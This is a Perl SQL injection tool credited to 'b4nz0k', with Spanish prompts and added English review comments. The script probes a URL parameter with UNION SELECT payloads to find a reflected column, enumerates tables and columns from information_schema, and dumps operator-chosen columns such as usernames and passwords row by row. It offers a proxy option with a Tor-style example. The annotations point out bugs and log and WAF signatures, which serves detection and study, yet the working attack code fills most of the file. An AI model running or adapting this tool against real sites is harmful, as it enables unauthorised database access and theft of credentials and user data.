- use HTTP::Request;
- use LWP::UserAgent;
- # One LWP::UserAgent is created here and shared by every request the script
- # sends. Nothing in the lines shown sets an agent string on it, so requests
- # would carry LWP's default User-Agent; that header is worth checking when
- # reviewing access logs for this traffic.
- # NOTE(review): no `use strict` / `use warnings` appears in the lines shown;
- # apart from the few `my` variables, everything below is a package global
- # shared between the subs.
- my $browser = LWP::UserAgent->new();
- # No first argument: print the usage banner (banner() exits with status 1).
- unless ($ARGV[0]) { &banner; }
- # Set the defaults and read the options from @ARGV.
- &variables_ARGV;
- # variables_ARGV: assigns the script's package-global defaults, then walks
- # @ARGV and copies the value following each recognised flag into a global.
- # Takes no parameters and returns nothing useful; its effect is the globals.
- sub variables_ARGV
- {
- # Default values
- # Upper bound for the column-count loop in sql_1 (also reused as the row
- # limit in columnas_1).
- $columns_count = 30;
- # Literal suffix appended to each generated request URL.
- $end = "+--+";
- # Literal separator placed between SQL keywords in the generated query
- # strings. Both $end and $un are sent inside GET URLs, so they show up
- # verbatim in web-server access logs.
- $un = "/**/";
- # The two file names below are assigned here but not read anywhere in the
- # lines shown.
- $column_file = "columnas.txt";
- $table_file = "tablas.txt";
- # Default value of the injected parameter; replaced by the URL's trailing
- # digits in the top-level URL handling.
- $num_url = "5";
- # Bare mentions of the two arrays (no assignment); they are filled by
- # tablas_1.
- @dbs;
- @tablas_db;
- # Command-line argument handling
- my $i = 0;
- # foreach aliases $i to each element of @ARGV in turn; the tests below read
- # $ARGV[$i] and $ARGV[$i+1].
- foreach $i (@ARGV)
- {
- # -c / --columns : value stored in $columns_count
- if ($ARGV[$i] eq "-c" || $ARGV[$i] eq "--columns" ) { $columns_count = $ARGV[$i+1] }
- # -u / --url : value stored in $url
- if ($ARGV[$i] eq "-u" || $ARGV[$i] eq "--url") { $url = $ARGV[$i+1] }
- # -px / --proxy : value stored in $proxy
- if ($ARGV[$i] eq "-px" || $ARGV[$i] eq "--proxy") { $proxy = $ARGV[$i+1] }
- # -m / --metod : value stored in $metod
- if ($ARGV[$i] eq "-m" || $ARGV[$i] eq "--metod") { $metod = $ARGV[$i+1] }
- # -tf / --table_file : value stored in $user_file (not $table_file)
- if ($ARGV[$i] eq "-tf" || $ARGV[$i] eq "--table_file") { $user_file = $ARGV[$i+1] }
- # -cf / --column_file : value stored in $pass_file (not $column_file)
- if ($ARGV[$i] eq "-cf" || $ARGV[$i] eq "--column_file"){ $pass_file = $ARGV[$i+1] }
- # -h / --help : print the option summary; help() exits
- if ($ARGV[$i] eq "-h" || $ARGV[$i] eq "--help") {&help}
- $i++;
- }
- }
- # URL handling (top-level code, runs once after variables_ARGV returns)
- # No URL supplied: print the banner and exit.
- unless ($url) { &banner }
- # Prepend "http://" unless the string already begins with exactly that.
- $url = "http://" . $url if $url !~ m/^http\:\/\//;
- # Capture the host name and the directory part of the path into globals.
- if ($url =~ m/^http\:\/\/([a-zA-Z0-9-.]+)\/(.*)\//)
- { $host = $1; $path = $2; }
- # Trailing digits of the URL are taken as the parameter value ($num_url)
- # and their length is remembered ...
- if ($url =~ m/(\d+)$/) { $num_url = $1; $leang = length($1); }
- # ... so that exactly that many characters can be chopped off the end of
- # $url. Later code rebuilds each request as $url . $num_url . <query>.
- for ($i=1;$i<=$leang; $i++) { chop ($url); }
- # Start the scan (prints the banner, then runs sql_1).
- &scann;
- # print "$url",$num_url,"\n";
- # exit;
- # banner: prints the ASCII-art logo and a one-line usage hint, then
- # terminates the process with exit status 1. Called when no arguments or
- # no URL were given.
- sub banner {
- print "
- .|'''.| ..|''|| '||'
- ||.. ' .|' || ||
- ''|||. || || ||
- . '|| '|. '. '| || Scann
- |'....|' '|...'|. .||.....|
- C o d e d b y [ b 4 n z 0 k ]
- Modo de Uso:
- perl sql.pl -u 'http://site.com/path/arc.php?vuln=123' <opciones>
- mas informacion >> perl sql.pl -h
- "; print "\n"; exit 1; }
- # help: prints the option summary and terminates the process with exit
- # status 1. The text lists methods 0-10, but in the lines shown the -m value
- # is only stored in $metod and never read; the first line of the help text
- # itself says that not all options are implemented yet.
- sub help {
- print "
- ##-- Todas las Opciones no se han Complementado aun...--##
- -u La Url a injectar
- --url ejemplo (-u 'web.com/index.php?id=5')
- -c El Numero de Columnas a Buscar
- --columns ejemplo: -c 5 = 1,2,3,4,5
- defautl: 30
- -px Proxy a usar ejemplo:
- --proxy -px 127.0.0.1:9050
- -m Metodo a Utilizar
- --metod ejemplo metod 1,3,4
- 0 . * SQL (Auto Detect)
- 1 . * MySQL (inject union boolean)
- 2 . * MySQL (order by)
- 3 . * MySQL (bind)
- 4 . * MySQL (error based)
- 5 . * MsSQL (inject)
- 6 . * MsSQL (boolean)
- 7 . * MsSQL (bind)
- 8 . * MsAcces Inject
- 9 . * Oracle Inject
- 10 . * PostgreSQL Inject
- default: Autodetect...
- -h Consulta de los
- --help comandos del script
- "; print "\n"; exit 1;
- }
- # Top-level code that runs after scann/sql_1 have returned. $vulnerado is set
- # by sql_1 only when its marker string came back in a response body.
- # NOTE(review): the "not vulnerable" message therefore means only that this
- # one reflected-marker probe found nothing; it is not evidence that the
- # parameter is safely handled on the server.
- unless ($vulnerado) { print "[*] La Web no es Vulnerable\n"; }
- # A reflected marker was seen: continue with table enumeration.
- if ($vulnerado) { &tablas_1 }
- # scann: prints the ASCII-art logo (without the usage lines) and then runs
- # the column probe in sql_1.
- sub scann {
- print "
- .|'''.| ..|''|| '||'
- ||.. ' .|' || ||
- ''|||. || || ||
- . '|| '|. '. '| || Scann
- |'....|' '|...'|. .||.....|
- C o d e d b y [ b 4 n z 0 k ]
- "; &sql_1;
- }
- # sql_1: sends up to $columns_count GET requests, each carrying a UNION
- # SELECT with one more column than the last, and looks for a marker string
- # in the response body. On a hit it sets $vulnerado, $num_columns and
- # $inject_columns and stops.
- #
- # What this looks like from the server side: a burst of sequential requests
- # to one parameter whose query string contains "/**/union/**/select/**/",
- # the hex literal 0x62346e7a306b (ASCII "b4nz0k") and the "+--+" suffix.
- # Those literals are fixed in this file, so they are usable as log/WAF
- # signatures. The probe only has an effect where the application builds its
- # SQL by string concatenation; bound parameters leave it inert.
- sub sql_1 {
- #############################################
- # SQL union select (Boolean)
- #
- # Globals read here, with the defaults assigned in variables_ARGV:
- # $columns_count = "30";
- # $end = "+--+";
- # $un = "/**/";
- # $num_url = "5";
- # "$table_schema;" below is a bare mention with no effect.
- print "\n[*] Escaneando Path...\n"; $table_schema;
- # Fixed prefix: and 1=0 union select, with $un between the words.
- $union = $un ."and" . $un . "1=0" . $un . "union" . $un . "select" . $un;
- $i=1; while ($i<=$columns_count)
- {
- # $cont1 is the plain list 1,2,3,...; it is only used by the
- # commented-out print at the end. $hex is 99999<i>99999, so the column
- # index can be read back out of the response.
- if ($i eq 1) {$cont1.= $i} else {$cont1.=',' . $i} $hex = "99999" . $i ."99999";
- # $cont2 grows by one concat(marker, 99999<i>99999) item per pass.
- if ($i eq 1) {$cont2.="concat(0x62346e7a306b,$hex)";}
- else {$cont2.=',' . "concat(0x62346e7a306b,$hex)";}
- # Overwrites the global $path set by the URL handling with the full
- # request URL for this pass.
- $path = $url . $num_url . $union . $cont2;
- my $request = $browser->get($path . $end);
- my $content = $request->content;
- # The marker followed by 99999<n>99999 in the body means column <n> of
- # the query is echoed into the page.
- if ($content =~ m/b4nz0k99999(\d+)99999/)
- { print "[*] Web Vulnerada en la Columna [$1]\n[*] CoLumna en el Numero [" . $i . "]\n";
- $vulnerado = "Si"; $num_columns = $i; $inject_columns = $1;
- # The statement after "last" on the next line is never reached.
- last; unless ($vulnerado) { &tablas_1; }
- } $i++;
- } # print "$cont1\n";
- }
- # tablas_1: asks the operator for a mode on STDIN and then requests table
- # names from information_schema.tables through the column found by sql_1.
- # Mode 1 asks for all names in one group_concat() response; mode 2 asks for
- # one row per request with "limit N,1". Results are printed and pushed onto
- # @tablas_db (and @dbs for schema names). Control flow relies on goto labels
- # and package globals, so statement order matters here.
- #
- # Server-side view: requests naming information_schema.tables, and in mode 2
- # a run of near-identical requests whose only difference is an incrementing
- # "limit/**/N,1". What the listing can return is bounded by the privileges
- # of the database account the web application connects with.
- sub tablas_1 { ################--Group_Concat--############
- print "\n[*] Selecciona el modo\n\t1 todas las tablas\n\t2 Tabla por tabla (Recomendado) \n\t";
- # chop removes the last character of the line read (normally the newline).
- $concat = <STDIN>; chop ($concat);
- # Any input containing "1" goes to concat_1, otherwise any containing "2"
- # goes to concat_2; anything else falls through into concat_1.
- goto concat_1 if ($concat =~ m/1/); goto concat_2 if ($concat =~ m/2/);
- concat_1:
- # Build the list 1,2,...,$num_columns (trailing comma chopped).
- for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont);
- # Replace every occurrence of the string $inject_columns in that list with
- # a group_concat() that wraps each table_name in the marker.
- $cont =~ s /$inject_columns/group_concat(0x62346e7a306b,table_name,0x62346e7a306b)/g;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . "information_schema.tables" . $end;
- my $request = $browser->get($p1);
- my $content = $request->content;
- # Everything between the first and last marker is split on the marker.
- if ($content =~ m/b4nz0k(.*)b4nz0k/)
- { $tablass = $1; @split_tablas = split ("b4nz0k",$tablass);
- print "\n\t####--Datos Schema--####\n\n";foreach $n (@split_tablas)
- { push (@tablas_db,$n); print "[ $n ]\n" if $n =~ m/([a-zA-Z0-9-.]+)/; }
- print "\n\n"; $b=$num_columns;
- }
- ###############--Concat--############
- # Reached either by "goto concat_2" or when the mode-1 response held no
- # marker.
- else {
- concat_2:
- $cont=""; for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont);
- # Same substitution, but one row per response: marker, table_name, marker,
- # table_schema, marker.
- $cont =~ s /$inject_columns/concat(0x62346e7a306b,table_name,0x62346e7a306b,table_schema,0x62346e7a306b)/g;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . "information_schema.tables" . $un . "limit" . $un;
- # $d is the row offset; the loop allows up to 100000 requests and stops at
- # the first response without the marker pattern.
- $d=0; while ($d <= 99999)
- { my $request = $browser->get($p1 . $d . ",1" . $end);
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k(.*)b4nz0k/) {
- # Record and print the schema name when it differs from the previous one
- # (the comparison uses the numeric operator !=).
- $table_schema = $2 and push (@dbs,$table_schema) and print "\n\t[ # $table_schema # ]\n" if $table_schema != $2;
- print "[ $1 ]\n"; push (@tablas_db,$1); }
- # No marker: on the first rows print a "no permission" message, then force
- # the loop to end.
- else { print "[*] Sin Permisos para la Base de Datos Schema\n" if $d <= 1; $d=99999; } $d++;
- # columnas_1 is called at the end of the else branch and again after the
- # if/else.
- } &columnas_1; } &columnas_1;
- }
- # columnas_1: two interactive steps. First it reads a table name from STDIN
- # and requests that table's column names from information_schema.columns.
- # Then (label datos_1) it reads a comma-separated list of column names and
- # requests rows from the table one at a time with "limit N,1", printing the
- # values found between markers. All state is in package globals
- # ($num_columns, $inject_columns, $union, $url, $num_url, $un, $end).
- #
- # Server-side view: this is the stage at which application data leaves in
- # response bodies, wrapped in the literal "b4nz0k". Inspecting responses for
- # that marker, as well as requests for "table_name=char(" and
- # "limit/**/N,1", gives a detection point after the initial probe.
- sub columnas_1 {
- # Label only; no goto in the lines shown targets it.
- columnas_1:
- $tablaa = ""; print "[*] Escriba la tabla que desea consultar: ";
- $tablaa = <STDIN>; chop ($tablaa); $ascci="";
- # The table name is turned into a comma-separated list of character codes
- # so it can be sent as char(...) rather than as a quoted string.
- @array_ascci = split (//,$tablaa); print "\t[##--$tablaa--##]\n";
- foreach $i (@array_ascci)
- { $ascci = $ascci . ord($i) . ","; } chop ($ascci);
- # Column list 1..$num_columns with the reflected column replaced by a
- # group_concat() over column_name.
- $cont=""; for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont);
- $cont =~ s /$inject_columns/group_concat(0x62346e7a306b,column_name,0x62346e7a306b)/g;
- $wheere ="information_schema.columns" . $un . "where" . $un . "table_name=char(" . $ascci . ")" . $end;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . $wheere;
- # print "$p1\n"; exit;
- # The request URL is $p1 followed by $d, ",1" and $end. $d is a package
- # global that this sub never assigns, and $p1 already ends with $end.
- my $request = $browser->get($p1 . $d . ",1" . $end);
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k/) {
- $columnass = $1; @split_columnas = split ("b4nz0k",$columnass);
- print "\n\t####--$tablaa--####\n\n"; $n=""; foreach $n (@split_columnas)
- { print "[ $n ]\n" if $n =~ m/([a-zA-Z0-9-.]+)/; }
- print "\n\n";
- }
- # Second step: row retrieval. "$s;" is a bare mention; $s is not reset here,
- # so it keeps whatever an earlier call left in it.
- datos_1:
- $cont=""; for ($b=1;$b<=$num_columns;$b++) { $cont.= $b . "," } chop ($cont); $s; $nn = "";
- print "[*] Escriba los datos a consultar: \n"; print "[* Ejemplo] usuario,password : ";
- $tablaa2 = <STDIN>; chop ($tablaa2); @dataa = split (",",$tablaa2); print "\n\t[##--$tablaa2--##]\n";
- # Each requested column is followed by the marker; the final comma is
- # chopped. The operator's text goes into the query string unmodified.
- @dataa = split(",",$tablaa2); foreach $nn (@dataa) { $s.= $nn . ",0x62346e7a306b,"; } chop ($s);
- $cont =~ s /$inject_columns/concat(0x62346e7a306b,$s)/g;
- $p1 = $url . $num_url . $union . $cont . $un . "from" . $un . $tablaa . $un . "limit" . $un;
- # print "$p1\n";
- # One request per row offset, 0 through $columns_count (the column-probe
- # limit doubles as the row limit). Only two captured values are printed.
- for ($x=0;$x<=$columns_count;$x++) {
- my $request = $browser->get($p1 . $x . ",1" . $end );
- my $content = $request->content;
- if ($content =~ m/b4nz0k(.*)b4nz0k(.*)b4nz0k/) {
- print "[ $1\t:: $2 ]\n"; }
- # No marker: print a "no permission" message for the first row only, then
- # force the loop to end.
- else { print "[*] Usuarios sin Permisos para estos datos \n" if $x==0; $x = $columns_count; }
- print "\n";
- }
- }
- # sql_3: stub. It prints a heading and rebuilds the same $union prefix that
- # sql_1 uses, and does nothing else; no request is sent. Nothing in the
- # lines shown calls it.
- sub sql_3 {
- #############################################
- # SQL - Bind (Brute Force)
- #
- # Defaults assigned in variables_ARGV:
- # $columns_count = 30;
- # $end = "+--+";
- # $un = "/**/";
- # $num_url = "5";
- print "[*] SQL Bind Inject\n";
- $union = $un ."and" . $un . "1=0" . $un . "union" . $un . "select" . $un;
- }